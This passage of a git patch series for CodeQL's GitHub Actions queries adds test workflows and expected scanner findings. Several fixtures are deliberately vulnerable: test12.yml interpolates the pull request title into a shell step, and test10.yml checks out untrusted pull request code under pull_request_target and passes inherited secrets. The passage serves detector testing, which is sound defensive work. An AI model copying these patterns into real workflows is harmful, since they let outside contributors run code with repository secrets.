.../CWE-829/UntrustedCheckoutHigh.expected | 3 ++ 7 files changed, 65 insertions(+), 14 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml deleted file mode 100644 index bb873ca4eac8..000000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: CI - -on: - pull_request_target: - -jobs: - test: - runs-on: ubuntu-latest - steps: - - run: | - echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} - - - diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 000000000000..f81bef89568f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -0,0 +1,13 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.title || "foo" }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2097a589b5a3..4123359b5514 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -475,6 +476,7 @@ subpaths | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ce4d74467f95..fa665b853884 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml new file mode 100644 index 000000000000..e8b5466f7516 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -0,0 +1,37 @@ +name: Build Android app (stripe) +on: + push: + branches: + - main + - fix-ci + workflow_dispatch: + pull_request_target: + branches: + - main + paths: + - 'custom-payment-flow/client/android-kotlin/**' + - '!**.css' + - '!**.md' + +jobs: + android_build: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.after || github.event.pull_request.head.sha }} + + - name: Build + working-directory: custom-payment-flow/client/android-kotlin + run: | + ./gradlew build + + dependabot-auto-merge: + if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} + needs: android_build + permissions: + contents: write + pull-requests: write + uses: ./.github/workflows/wf_dependabot.yaml + secrets: inherit diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 711a529b179c..7313ffd9ae33 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -174,6 +174,7 @@ edges | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -207,6 +208,13 @@ edges | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | @@ -214,6 +222,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 3619941aa12e..b9cf0e547ca7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,9 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 321e5504bc34945054ac2f13d76ae44e4f02e0aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:59:04 +0200 Subject: [PATCH 502/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0392a200bb40..45d91dcb7cc3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.41 +version: 0.1.42 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5b81393abdb4..a41aba954384 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.41 +version: 0.1.42 groups: [actions, queries] suites: codeql-suites extractor: javascript From b199fdc3e255b92dfe57434d6a6316323a6f0ef9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:10 +0200 Subject: [PATCH 503/707] Add new models for file listing actions --- ...riHaximus_github-action-files-in-commit.model.yml | 9 +++++++++ .../ext/manual/ab185508_file-type-finder.model.yml | 10 ++++++++++ .../manual/ankitjain28may_list-files-in-pr.model.yml | 9 +++++++++ .../avraamMavridis_files-changed-action.model.yml | 10 ++++++++++ .../manual/jsmith_changes-since-last-tag.model.yml | 12 ++++++++++++ .../karpikpl_list-changed-files-action.model.yml | 8 ++++++++ ql/lib/ext/manual/knu_changed-files.model.yml | 11 +++++++++++ .../ext/manual/martinhaintz_ga-file-list.model.yml | 8 ++++++++ .../manual/rishabh510_path-lister-action.model.yml | 9 +++++++++ .../manual/the-coding-turtle_ga-file-list.model.yml | 8 ++++++++ .../ext/manual/w3f_action-find-old-files.model.yml | 8 ++++++++ ql/lib/ext/manual/yumemi-inc_changed-files.model.yml | 9 +++++++++ 12 files changed, 111 insertions(+) create mode 100644 ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml create mode 100644 ql/lib/ext/manual/ab185508_file-type-finder.model.yml create mode 100644 ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml create mode 100644 ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml create mode 100644 ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml create mode 100644 ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml create mode 100644 ql/lib/ext/manual/knu_changed-files.model.yml create mode 100644 ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/rishabh510_path-lister-action.model.yml create mode 100644 ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/w3f_action-find-old-files.model.yml create mode 100644 ql/lib/ext/manual/yumemi-inc_changed-files.model.yml diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml new file mode 100644 index 000000000000..e2009c888518 --- /dev/null +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/WyriHaximus/github-action-files-in-commit + - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml new file mode 100644 index 000000000000..119b4b1d814b --- /dev/null +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ab185508/file-type-finder + - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"] + diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml new file mode 100644 index 000000000000..e3c9297cf233 --- /dev/null +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ankitjain28may/list-files-in-pr + - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml new file mode 100644 index 000000000000..c14bc95c013d --- /dev/null +++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/AvraamMavridis/files-changed-action + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"] + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml new file mode 100644 index 000000000000..3a5cf8c8be2d --- /dev/null +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/jsmith/changes-since-last-tag + - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"] + diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml new file mode 100644 index 000000000000..0d4df5ef6b1d --- /dev/null +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -0,0 +1,8 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/karpikpl/list-changed-files-action + - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml new file mode 100644 index 000000000000..5e7374dabad4 --- /dev/null +++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -0,0 +1,11 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/knu/changed-files + - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml new file mode 100644 index 000000000000..9d0ecf04c6b8 --- /dev/null +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/martinhaintz/ga-file-list + - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"] + - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml new file mode 100644 index 000000000000..281602cf0c73 --- /dev/null +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/Rishabh510/Path-lister-action + - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml new file mode 100644 index 000000000000..7daafbc2fd81 --- /dev/null +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/the-coding-turtle/ga-file-list + - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"] + - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml new file mode 100644 index 000000000000..38d892966d4a --- /dev/null +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/w3f/action-find-old-files + - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"] + diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml new file mode 100644 index 000000000000..c65f7b1055fb --- /dev/null +++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/yumemi-inc/changed-files + - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"] + + From 15bb4d851d8210ce97b1d44bec6d7a8edd71b4aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:31 +0200 Subject: [PATCH 504/707] Add new test for flow through matrix --- .../CWE-094/.github/workflows/matrix_flow.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml new file mode 100644 index 000000000000..1093ddd3c4c1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml @@ -0,0 +1,29 @@ +name: Matrix Flow + +on: + pull_request_target: + +jobs: + lookup: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.filelist.outputs.file_names }} + steps: + - uses: actions/checkout@v2 + - name: Get all zip files + id: filelist + uses: the-coding-turtle/ga-file-list@v0.1 + with: + directory: "." + file_extension: "zip" + + multi_tenant: + needs: lookup + runs-on: ubuntu-latest + strategy: + matrix: + tenant: ${{fromJson(needs.lookup.outputs.matrix)}} + steps: + - name: Show all files + run: | + echo "this is file: ${{ matrix.TENANT }}" From 5fe81ddb08b18a29bce260d9a052c623e2049931 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:07:25 +0200 Subject: [PATCH 505/707] Update tests --- ql/test/library-tests/test.expected | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6bedcadcdbab..9205675ac0fe 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1327,10 +1327,18 @@ scopes | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | | alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | | eficode/resolve-pr-refs | * | output.head_ref | branch | manual | @@ -1345,16 +1353,30 @@ sources | jitterbit/get-changed-files | * | output.modified | filename | manual | | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | | 